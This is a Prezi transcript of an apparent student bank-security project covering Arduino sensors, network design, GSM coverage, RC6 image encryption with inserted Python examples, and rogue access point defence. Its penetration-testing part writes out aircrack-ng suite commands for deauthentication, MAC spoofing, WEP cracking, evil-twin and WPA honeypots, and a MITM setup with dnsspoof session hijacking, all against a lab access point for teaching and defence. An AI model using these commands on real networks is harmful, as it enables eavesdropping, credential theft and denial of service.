Untitled Prezi

No description

Ola Ali

on 30 June 2013


Transcript of Untitled Prezi

Bank Security system
Bank security
Idea of detecting motion

The PC switches our system between day mode and night mode.
We can control our system wirelessly using XBee.

Wireless connection
The wireless system used must be compatible with the Arduino and the sensors.

Arduino program flow chart
Network Design

The network is divided into 3 major networks.
We designed the network according to:

1- The internal network of the bank
2- The service provider network
3- The other site of the network in another city

What network did we design?

1- Multi-site network (wired network)
2- Multi-site network (VoIP network)
3- Single-site network (wireless network)

What about the wired security itself?


Data transmission
GSM transmission chain
About The Designed Firewall
Flow chart

What about the wired network itself?

What is Lockitron?

It's a mobile application that allows you to remotely open and close doors …

What does it have to do with our project?

We replaced the card reader owned by each employee with that mobile application on each employee's mobile.
Benefits:
2- Less cost
3- Flexible (can be repaired and tuned easily)

Our main focus in the project is to design a security system for a bank, and we're considering everything in that secure system.
Our security system involves 5 major topics, which are:
1- Control and surveillance
2- Network design
4- Indoor coverage (GSM coverage)
5- Penetration testing

The addition of WLANs to the corporate environment introduces a new class of threats for network security. Rogue access points are the greatest threat.
What is a Rogue AP?

What are some specific attacks which can be launched through a Rogue AP?
1. MAC address spoofing

Evil twin with MAC spoofing

2. Denial-of-Service

a. De-authentication attack
b. Disassociation attack
c. Signal interference

How can you protect the enterprise network from Rogue APs?
* Can the firewall protect from Rogue APs?


Signal transmission problems
Penetration Testing

Security camera
(motion detection)
CCTV system
Our model
Flow chart
Frame of camera
Wireless Lab Setup:
1- Hardware Requirements

1- iwconfig

2- ifconfig wlan1 up
ifconfig wlan1

Testing connectivity between the tester laptop and the access point:
- Commands:
1- iwlist wlan1 scanning

2- iwconfig wlan1 essid "ESLAM TEST"
- iwconfig wlan1

- WLAN frame types: 1- Management frames
2- Control frames
3- Data frames
- Meaning of sniffing frames.
- Sniffing management, control, and data frames over any wireless network:
1- Monitor mode interface
2- Wireshark
----- 1- Monitor mode interface:
Commands:
a- airmon-ng

b- airmon-ng start wlan1

c- airmon-ng
----- 2- Wireshark:
Commands:
a- wireshark & , then Capture -> Interfaces -> mon0 -> Start

b- Filters: - Management frames only: wlan.fc.type == 0
- Control frames only: wlan.fc.type == 1
- Data frames only: wlan.fc.type == 2

- Sniffing management, control, and data frames over a given wireless network:
- Commands:
1- airodump-ng --bssid A0:F3:C1:78:32:4B mon0

2- iwconfig mon0 channel 6
- iwconfig mon0

3- wireshark & , then Capture -> Interfaces -> mon0 -> Start
4- Filter: wlan.bssid == A0:F3:C1:78:32:4B
5- Filter: data packets only: (wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20)

Injecting packets into a given wireless network:
- Meaning of packet injection.
- Commands:
1- aireplay-ng -9 -e "ESLAM TEST" -a A0:F3:C1:78:32:4B mon0

Uncovering hidden SSIDs:
1- Legitimate client (Probe Request, Probe Response)
2- Sending deauthentication packets.
 Command: aireplay-ng -0 5 -a A0:F3:C1:78:32:4B mon0
MAC filters:
Setting up the wireless card (Alfa) and configuring it
Commands:

- Beating MAC filters:
- Commands: 1- airodump-ng -c 6 -a --bssid A0:F3:C1:78:32:4B mon0

Commands: 2- macchanger -m B0:EC:71:B1:8A:17 wlan1

Authentication types:
1- Open
2- Shared key
3- Wired Equivalent Privacy (WEP)
4- Wi-Fi Protected Access (WPA)
5- Wi-Fi Protected Access v2 (WPA2)

1- Open authentication:

- Bypassing open authentication:
- Commands: a- iwconfig wlan1 essid "ESLAM TEST"
b- iwconfig wlan1

2- Shared key authentication:

- Bypassing shared key authentication:
Commands: a- wireshark & , then Capture -> Interfaces -> mon0 -> Start
b- airodump-ng mon0 -c 1 --bssid A0:F3:C1:78:32:4B -w keystream

c- ls
d- aireplay-ng -1 0 -e "ESLAM TEST" -y keystream-04-A0-F3-C1-78-32-4B.xor -a A0:F3:C1:78:32:4B -h aa:aa:aa:aa:aa:aa mon0

e- On Wireshark, filter: wlan.addr == aa:aa:aa:aa:aa:aa
---- First Packet :

---- Second Packet :

---- Third Packet :

---- Fourth Packet :

3- WEP encryption:

- Bypassing WEP encryption:
- Commands:
a- airodump-ng mon0

b- airodump-ng --bssid A0:F3:C1:78:32:4B --channel 1 --write WEPCrackingDemo mon0

c- aireplay-ng -3 -b A0:D3:C1:78:32:B4 -h B0:EC:71:B1:8A:17 mon0 (capture ARP packets)

d- aircrack-ng WEPCrackingDemo-01.cap

Which type of detection can I use?
Motion detection camera
2- Adjacent channel interference
3- Multipath fading

Rayleigh theorem

4- Shadow fading

5- Doppler shift

6- Delay Spread (Time Dispersion)
7- Distance Between MS and BTS
8- Path loss

Speech encoder

1. Analog to digital conversion
(GSM uses PCM, 'Pulse Code Modulation')
We reduce the bandwidth
* Sampling

* Band-limiting + sampling
* Quantizing

* Encoding
Number of levels = 2^13 = 8192 levels
Encoder rate = 8000 * 13 = 104 kb/s
2. Segmentation

We divide the signal into groups; each group takes 20 ms and has 2080 bits
20 ms * 104 kbps = 2080 bits

Channel coding
* Block coder
Adds 3 bits called 'parity check bits'
* Convolutional code
Doubles the bits

* Block interleaving

* Burst interleaving

Burst assembly and multiplexing
Here we add the training sequence, flags, T.B and H.B
GMSK ('Gaussian Minimum Shift Keying') is the modulation scheme for the GSM system

Encryption is the process of encoding messages (or information) in such a way that hackers cannot read it; the message or information (referred to as plaintext) is encrypted using an encryption algorithm, turning it into unreadable ciphertext.
This is usually done with the use of an encryption key.
Encryption was first used in a simple way: shifting every letter 3 places.

The RC6 Algorithm

It looks like the algorithm used for text, but we deal with images, so to encrypt an image we encrypt the image pixels to produce scattered pixels that are hard to understand.
By this we will have an image that is unclear to others, so we are able to keep the image secure from hackers.

I will translate some of the last steps and add new steps into the MATLAB code.
Some additions to develop the code:
1- Instead of using a fixed key we can take a key from the command window in MATLAB, with some conditions
2- We can use shift operations to make the encrypted image more unclear to an attacker
3- We can divide the image into more than 4 parts, and the division can be done by equal-length parts, equal-width parts, or both
4- When collecting the parts to form the image, many arrangements can be followed instead of the one used in the code
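Worked example of the RC6-on-pixels idea above, written in Python rather than the presentation's MATLAB (this is an added example, not the project's code): a straight RC6-32/20/16 implementation following the published algorithm, then the same image encrypted block by block (ECB) and with each block chained to the previous ciphertext (CBC). The key, IV and the 16x16 test image are constructed. The comparison shows why the presentation reaches for extra shifts and part shuffling: encrypting a picture row by row with no chaining keeps its large shapes visible, because identical pixel rows give identical ciphertext rows, and chaining the blocks is the standard fix.

```python
# Added example (not the presentation's MATLAB code): RC6-32/20/16 over image pixels.
# The key, IV and 16x16 "image" below are constructed test data, not project values.
R, MASK, LOG_W = 20, 0xFFFFFFFF, 5          # rounds, 32-bit word mask, log2(word size)
P32, Q32 = 0xB7E15163, 0x9E3779B9           # RC6 key-schedule magic constants
BLOCK = 16                                  # bytes per block: four 32-bit words

def rotl(x, n):
    n &= 31
    return ((x << n) | (x >> (32 - n))) & MASK

def rotr(x, n):
    n &= 31
    return ((x >> n) | (x << (32 - n))) & MASK

def key_schedule(key):
    """RC6 key schedule: expand a 16-byte key into the 2R+4 round words."""
    c = len(key) // 4
    L = [int.from_bytes(key[4*i:4*i+4], "little") for i in range(c)]
    S = [(P32 + i * Q32) & MASK for i in range(2 * R + 4)]
    a = b = i = j = 0
    for _ in range(3 * max(c, len(S))):
        a = S[i] = rotl((S[i] + a + b) & MASK, 3)
        b = L[j] = rotl((L[j] + a + b) & MASK, a + b)
        i, j = (i + 1) % len(S), (j + 1) % c
    return S

def words(block):
    return [int.from_bytes(block[4*k:4*k+4], "little") for k in range(4)]

def unwords(ws):
    return b"".join(w.to_bytes(4, "little") for w in ws)

def encrypt_block(S, block):
    a, b, c, d = words(block)
    b, d = (b + S[0]) & MASK, (d + S[1]) & MASK
    for i in range(1, R + 1):
        t = rotl((b * (2 * b + 1)) & MASK, LOG_W)
        u = rotl((d * (2 * d + 1)) & MASK, LOG_W)
        a = (rotl(a ^ t, u) + S[2 * i]) & MASK
        c = (rotl(c ^ u, t) + S[2 * i + 1]) & MASK
        a, b, c, d = b, c, d, a
    return unwords([(a + S[2 * R + 2]) & MASK, b, (c + S[2 * R + 3]) & MASK, d])

def decrypt_block(S, block):
    a, b, c, d = words(block)
    c, a = (c - S[2 * R + 3]) & MASK, (a - S[2 * R + 2]) & MASK
    for i in range(R, 0, -1):
        a, b, c, d = d, a, b, c
        u = rotl((d * (2 * d + 1)) & MASK, LOG_W)
        t = rotl((b * (2 * b + 1)) & MASK, LOG_W)
        c = rotr((c - S[2 * i + 1]) & MASK, t) ^ u
        a = rotr((a - S[2 * i]) & MASK, u) ^ t
    return unwords([a, (b - S[0]) & MASK, c, (d - S[1]) & MASK])

def blocks(data):
    if len(data) % BLOCK:
        raise ValueError("data must be a whole number of 16-byte blocks")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def xor(x, y):
    return bytes(p ^ q for p, q in zip(x, y))

def ecb_encrypt(key, data):
    """Each block encrypted independently: equal pixel rows give equal ciphertext rows."""
    S = key_schedule(key)
    return b"".join(encrypt_block(S, blk) for blk in blocks(data))

def ecb_decrypt(key, data):
    S = key_schedule(key)
    return b"".join(decrypt_block(S, blk) for blk in blocks(data))

def cbc_encrypt(key, iv, data):
    """Chain each block with the previous ciphertext so repeated rows no longer repeat."""
    S, prev, out = key_schedule(key), iv, []
    for blk in blocks(data):
        prev = encrypt_block(S, xor(blk, prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    S, prev, out = key_schedule(key), iv, []
    for blk in blocks(data):
        out.append(xor(decrypt_block(S, blk), prev))
        prev = blk
    return b"".join(out)

def sample_image():
    """Constructed 16x16 8-bit grayscale image: top half black, bottom half white.
    Each 16-byte row is exactly one RC6 block."""
    return bytes([0x00] * 128 + [0xFF] * 128)

def distinct_blocks(data):
    return len(set(blocks(data)))

if __name__ == "__main__":
    key, iv, img = bytes(range(16)), bytes([0xA5] * 16), sample_image()
    print("ECB distinct rows:", distinct_blocks(ecb_encrypt(key, img)))      # 2: the shape leaks
    print("CBC distinct rows:", distinct_blocks(cbc_encrypt(key, iv, img)))  # 16
```

With the block-by-block mode only two distinct ciphertext rows come out of a two-tone image, so the picture's outline survives encryption; with chaining every row differs. A fresh, unpredictable IV per image is part of the scheme, and the block cipher is only as strong as the key handling around it, which is the part the presentation's "key from the command window" step needs to get right.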

indoor coverage
Distributed Antenna System or ‘DAS’
Donor (roof) antenna
* Directional antenna
The higher the gain of the antenna, the more the signal is focused along a specific plane.
BDA (Bi-Directional RF Amplifier)
Special device

1-isotropic antenna

2-dipole antenna

Indoor antennas
* Omni directional antenna
Basic Single Structure application
The range of the different types of antenna

1. Bi-directional Amplifier (BDA)
 * Poor out-of-band rejection
 * Fixed filtering

2. Analog RF booster
 * Better filtering
 * Tunable
 * Multiple bands

3. Digital RF booster


Time Delay

 * The delay through a filter is inversely proportional to its bandwidth and directly proportional to the filter ‘order’

 * Filter that is narrow band with a sharp roll off will have a higher time delay than will a wide band filter with a soft roll off.


 * Preventing Feedback Oscillations
 * Automatic Gain Control (AGC)
 * Microprocessor-Controlled AGC
 * Automatic Gain Optimization during set up
 * Oscillation Prevention
 * Long Term Maintenance

Uplink Noise

Base Station Disease

Other Services Disease

Single Structure Fiber Optic application
Multiple Structure 'Campus' application
Example of RF distribution on one floor
Rogue APs represent unauthorized access points and can be internal or external.
Why is a Rogue AP such a bad thing?
A Rogue AP on the network is (logically) a LAN jack of your network hanging outside the premises.

We have two types of rogue access point:

1. The internal rogue AP
2. The external rogue access point

3. Man-in-the-Middle attack (MITM)

4. Monitoring WLAN traffic and breaking the encryption keys

- The firewall works at the traffic transfer point between the LAN and the Internet
- The firewall does not detect a Rogue AP
- The firewall does not see traffic through a Rogue AP

* Can WPA2 protect from Rogue APs?

You can enforce security controls such as WPA2 only on APs which you manage,
i.e., your authorized APs.

But a Rogue AP is not your managed AP.

* So what protects the network from Rogue APs?
A sensor-based wireless intrusion prevention system (WIPS):

Watches for Rogue APs 24x7
Performs wired/wireless correlation (AP network connectivity testing) to detect Rogue APs
Provides for automatic blocking of Rogue APs
Locates Rogue APs for easy searching and removal from the network

A typical wireless intrusion prevention system consists of:
* Wireless sensor
* Management server
* Database server
* Console
What does AP auto-classification mean in the context of Rogue APs?

What is the key technology enabler for accurate auto-classification? Testing an AP's connectivity to the monitored enterprise network is the key technology enabler.

Auto-classification errors:
1. False negative
2. False positive

How can WIPS detect a rogue access point?
1) MAC correlation (MAC table lookup)
Can be done using BackTrack and the Alfa card
a. The administrator has provided us with the list of MAC addresses of authorized clients and access points.
We create the monitor mode interface using our card as shown.

We use this command to start scanning the air seen by the Alfa card.

We dump a list of all MAC addresses on the switch of the clients' network. In the most common case, the wired and wireless interface MAC addresses of an AP differ by 1.

2) Signature packet injection
The main types of events which can be detected by wireless intrusion prevention systems:
1. Unauthorized WLANs and WLAN devices
(rogue APs, unauthorized stations);
This can also be done using BackTrack:
look at the client part of the airodump-ng output:

2. Misconfigured access points
3. The use of wireless network scanners
4. Denial of Service (DoS)
5. Man-in-the-middle attacks
6. Unusual usage patterns
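A defender-side sketch of two of the detections above, as an added example that is not the project's code or any WIPS product's logic: the MAC-correlation lookup against the switch table (using the "wired and wireless MAC differ by 1" heuristic from the slides, plus the evil-twin case from the attack list), and the de-authentication/disassociation flood that WIPS lists under denial of service, using the same wlan.fc.type_subtype values the Wireshark filters above rely on. The lab BSSID and SSID are the page's; the switch MAC table, the other scan rows and the frame timestamps are constructed.

```python
# Added example (not the project's code): WIPS-style triage of what a monitor-mode sensor sees.
# The switch MAC table, the extra scan rows and the frame records are constructed sample data.
from collections import defaultdict

DEAUTH, DISASSOC = 0x0C, 0x0A   # wlan.fc.type_subtype of deauthentication / disassociation frames

def mac_to_int(mac):
    return int(mac.replace(":", ""), 16)

def int_to_mac(value):
    return ":".join(f"{(value >> (8 * i)) & 0xFF:02X}" for i in reversed(range(6)))

def wired_neighbours(bssid):
    """The BSSID plus the MACs one above and one below it: the slides' 'wired and
    wireless MAC differ by 1' heuristic for guessing an AP's wired-side address."""
    v = mac_to_int(bssid)
    return {int_to_mac(n) for n in (v - 1, v, v + 1) if 0 <= n < (1 << 48)}

def classify_aps(air_scan, authorized, switch_macs):
    """Label every BSSID seen in the air: authorized, rogue-on-wire, evil-twin or external."""
    switch_macs = {m.upper() for m in switch_macs}
    our_ssids = set(authorized.values())
    labels = {}
    for bssid, ssid, _channel in air_scan:
        bssid = bssid.upper()
        if bssid in authorized:
            labels[bssid] = "authorized"
        elif wired_neighbours(bssid) & switch_macs:
            labels[bssid] = "rogue-on-wire"   # unknown AP whose MAC (or neighbour MAC) sits on our switch
        elif ssid in our_ssids:
            labels[bssid] = "evil-twin"       # advertises our SSID from a BSSID we do not own
        else:
            labels[bssid] = "external"        # somebody else's network, not on our wire
    return labels

def detect_deauth_flood(frames, window_s=5.0, threshold=10):
    """Flag BSSIDs that see >= threshold deauth/disassoc frames inside any window_s-second window."""
    times = defaultdict(list)
    for t, subtype, bssid in frames:
        if subtype in (DEAUTH, DISASSOC):
            times[bssid.upper()].append(t)
    alerts = {}
    for bssid, ts in times.items():
        ts.sort()
        start = peak = 0
        for end in range(len(ts)):            # sliding window over sorted timestamps
            while ts[end] - ts[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

# Constructed inventory: the lab AP from the page is the authorized one; the rest is made up.
AUTHORIZED_APS = {"A0:F3:C1:78:32:4B": "ESLAM TEST"}
SWITCH_MAC_TABLE = {"A0:F3:C1:78:32:4A", "00:1B:44:11:3A:B7", "DE:AD:BE:EF:00:10"}
AIR_SCAN = [  # (bssid, ssid, channel), the way airodump-ng would list them
    ("A0:F3:C1:78:32:4B", "ESLAM TEST", 6),
    ("DE:AD:BE:EF:00:11", "Guest-Printer", 11),
    ("B0:EC:71:B1:8A:17", "ESLAM TEST", 6),
    ("C8:3A:35:12:34:56", "Cafe-WiFi", 1),
]
# Constructed frame records: (seconds, type_subtype, bssid)
FRAMES = [(0.0, 0x08, "A0:F3:C1:78:32:4B")]                                   # one beacon
FRAMES += [(0.05 * i, DEAUTH, "A0:F3:C1:78:32:4B") for i in range(30)]         # burst of 30 deauths
FRAMES += [(1.0, DEAUTH, "C8:3A:35:12:34:56")]                                 # a single, normal deauth

if __name__ == "__main__":
    for bssid, label in classify_aps(AIR_SCAN, AUTHORIZED_APS, SWITCH_MAC_TABLE).items():
        print(f"{bssid}  {label}")
    print("deauth floods:", detect_deauth_flood(FRAMES))
```

The "differ by 1" rule is only triage: many vendors do not allocate addresses that way, so a "rogue-on-wire" label should be confirmed with the wired/wireless connectivity test the slides describe, and "evil-twin" cannot by itself separate a hostile AP from a neighbour who picked the same SSID. The flood threshold has to be tuned to the site's normal roaming rate, otherwise a busy floor generates false positives of exactly the kind the auto-classification slide warns about.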

How does WIPS contain a rogue access point?
1. Wired containment
2. Wireless containment

1. Wired containment

2. Wireless containment

Locating methods:
1. Convergence method
2. Vector method

Locating (physical place) rogue wireless access points without using WIPS:
2- Software Requirements
Hardware:
a. Two laptops with internal Wi-Fi cards.
b. One access point.
c. One Alfa wireless card.
d. An internet connection.
Software:
a. BackTrack 5.

- Setting up an access point and configuring it:

We used an Arduino board based on an AVR microcontroller chip.
We used an AVR microcontroller because it is:
1. Inexpensive
2. Simple to program
3. Low power consumption
4. Available from 8 to 64 pins

Small microcontroller board based on the ATmega32U4
Arduino specification:
How to create a rogue access point through BackTrack
1. Let us first bring up our rogue access point using airbase-ng and give it the ESSID Rogue:
2. Use these commands to create a bridge between the rogue AP and the Ethernet interface.

The attacks that can be launched through BackTrack
Microcontroller: ATmega32U4
Operating voltage: 5 V
Input voltage (recommended): 7-12 V
Input voltage (limits): 6-20 V
Input/output pins: 14 pins
PWM pins: 7 pins
Analog inputs: 6 pins
DC current per I/O pin: 40 mA
Flash memory: 32 KB
SRAM: 2.5 KB
Clock speed: 16 MHz
Why we used Arduino?

From the software side:

Simple to program

Has a lot of examples

Has a great variety of libraries

Cross-platform: works on Windows, Mac, Linux

From the hardware side:

Power socket and reset button

Sockets for I/O pins

USB connection

Programming circuit

Can be powered by USB

Generally:

Open source (hardware and software)
Inexpensive

What is Arduino?
AVR is just a programmable integrated circuit.
Arduino is a mini system that has an AVR microcontroller, power supply circuit, reset circuit and USB connection.

What types of Arduino?

How does it work?

1. Write the code (sketch) in the Arduino IDE using the Arduino C language
2. Then select the board and the serial COM port
3. Upload it to the Arduino board

In Arduino programming there are two main functions:
void setup()
Used to define inputs and outputs
void loop()
The code written here is repeated forever

How does Arduino communicate?

Arduino uses a UART for serial communication with a computer.

What is meant by serial communication?

A single data line transmitting data
Low power
Low speed
It has two types (synchronous and asynchronous)

What is meant by UART?

1. The Arduino hardware has built-in support for serial communication on pins 0 and 1,
which also goes to the computer via the USB connection.

2. This hardware allows the ATmega chip to receive serial communication even while working on other tasks, as long as there is room in the 64-byte serial buffer.

General information about UART:
1. A Universal Asynchronous Receiver/Transmitter (UART)
takes bytes of data and transmits the individual bits in sequence.
2. UART frame format (8-N-1)

What about the wireless network itself?
What is the difference between Arduino and a normal microcontroller (AVR)?
What about the VoIP network?

There are three types of sensor which depend
on infrared radiation:

1. Passive infrared sensor
2. Infrared sensor
3. Pressure switch

1. Passive infrared sensor

Idea of PIR in detecting motion
A PIR consists of:

Pyroelectric sensor
First we must know why we need to know about attacks.
By studying the types of attacks we will have the ability to know whether we are exposed to an attack or not.
Imagine that you have no idea about the attacks: you will surely be hacked too easily.

Processing circuit
1- Evil twin
First we make an access point with the same SSID as the access point in the vicinity. Many wireless users may accidentally connect to this malicious access point, thinking it is part of the authorized network. Once a connection is established, the attacker can orchestrate a man-in-the-middle attack and transparently relay traffic while eavesdropping on the entire communication.

Problems of PIR and how to avoid them?

1. No response to human motion
Solution:
Fresnel lens

2. False alarm
Solution:
IR window filter

- Now we send a de-authentication frame to the client,
so it disconnects and immediately tries to re-connect

- As we are closer to this client, our signal strength is higher and it connects to our evil twin access point, as shown in the following screens

Note :
An evil twin having the same MAC address as an authorized access point is even more difficult to detect and deter
Sensor pins
Calibration for the sensor
Angle: 120°
Distance: 7 m max
Advantages of the sensor
Low power consumption
Low cost
Wide-range lens
Easy to interface with

2- Honeypot:
Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Also, along with this list, it will display any networks available in its range.

If we create a fake access point "Wireless Lab" in the presence of the legitimate one, the client is still connected to the legitimate access point "Wireless Lab".

So we need to send broadcast de-authentication messages to the client on behalf of the legitimate access point to break their connection.

2. Infrared sensor:

Idea of the IR sensor
IR transmitter
IR receiver
3- Hirte attack
3. Pressure switch:
The Hirte attack extends the Caffe Latte attack using fragmentation techniques and allows almost any packet to be used. By creating a WEP access point, once any client connects to our honeypot AP, the Hirte attack is automatically launched.
Now, would it be possible to crack WPA-Personal with just the client? No access point!
To crack WPA, we need the following four parameters from the four-way handshake: authenticator nonce, supplicant nonce, authenticator MAC, supplicant MAC. Now the interesting thing is that we do not need all of the four packets in the handshake to extract this information. We can get this information with either all four packets, or packets 1 and 2, or just packets 2 and 3.

The switch changes between open and closed by:
temperature, like a thermostat
current and voltage, like a relay
pressure, as in our case

In order to crack WPA-PSK, we will bring up a WPA-PSK honeypot, and when the client connects to us, only Message 1 and Message 2 will come through. As we do not know the passphrase, we cannot send Message 3. However, Message 1 and Message 2 contain all the information required to begin the key cracking process.
The steps:
- We will set up a WPA-PSK honeypot with the ESSID Wireless Lab
- Let's also start airodump-ng to capture packets from this network:
- Now when our roaming client connects to this access point, it starts the handshake but fails to complete it after Message 2, as discussed previously

Man-in-the-Middle attack
The attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidentally get connected to this fake access point (or can be forced to, using the higher signal strength theory) and may continue to believe that he is connected to the legitimate access point.

The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces.

The steps:
1- We will first create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm -c 11 mon0:
2- Now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless (at0) interfaces
3- Let us now turn on IP forwarding in the kernel so that routing and packet forwarding can happen correctly, using echo 1 > /proc/sys/net/ipv4/ip_forward:
4- Now let us connect a wireless client to our access point mitm. It would automatically get an
IP address over DHCP (server running on the wired-side gateway).
5- We see that the host responds to the ping requests, as seen

6- We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine:
It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired side, we have full control over the traffic.
Wireless eavesdropping using MITM
The whole lab revolves around the principle that all the victim's traffic is now routed through the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from the victim's machine over wireless.
Start sniffing on the at0 interface, so that we can monitor all traffic sent and received by the wireless client.
When the wireless client opens any web page that needs a password to enter, by sniffing the packets and setting a filter for HTTP to see only the web traffic,
we can easily locate the HTTP POST request which was used to send the password to the wireless access point.

Expanding the HTTP header allows us to see that the password we entered in plaintext was actually not sent as is; instead, a hash has been sent.
Session hijacking over wireless
One of the other interesting attacks we can build on top of
MITM is application session hijacking. During an MITM attack, the victim's packets are sent to the attacker. It is now the attacker's responsibility to relay these to the legitimate destination and relay the responses from the destination to the victim. An interesting thing to note is that, during this process, the attacker can modify the data in the packets (if unencrypted and unprotected from tampering). This means he could modify, mangle, and even silently drop packets.

The steps:
1- Set up the test exactly as in the Man-in-the-Middle attack lab.
On the victim, let's fire up the browser and type in "google.com". Let us use Wireshark to monitor this traffic. Your screen should resemble the following

2- In order to hijack the browser session we will need to send fake DNS responses which will resolve the IP address of "google.com" to the hacker machine's IP address. The tool we will use for this is called dnsspoof and the syntax is dnsspoof -i mitm-bridge:
3- Refresh the browser window, and now, as we can see through Wireshark, as soon as the victim makes a DNS request for any host (including google.com), dnsspoof replies back:
On the victim machine, we see an error which says "Connection Refused". This is because we have made the IP address for google.com resolve to the hacker machine's IP, but there is no service listening on port 80:
4- Let us run Apache on BackTrack using the following command: apache2ctl start:
5- Now once we refresh the browser on the victim, we are greeted with the "It Works" default page of Apache:
This demonstration shows how it is possible to intercept data and send spoofed responses to hijack sessions on the victim.
Thank you
We faced more than one option compatible with the Arduino; the most used are:
Wi-Fi shield
Bluetooth shield
Ethernet shield
We used XBee.
What is XBee?
Just a blue chip with 20 pins
An RF module that can send data wirelessly
The current manufacturer of XBees is Digi

Why XBee?
Uses the IEEE 802.15.4 standard (LR-WPAN)
Low power consumption
Low data rate
Types of XBee:
Series 1
> 30 m range indoor
> DigiMesh network

Series 2
> 40 m range indoor
> ZigBee network

XBee Series 1
Pro & regular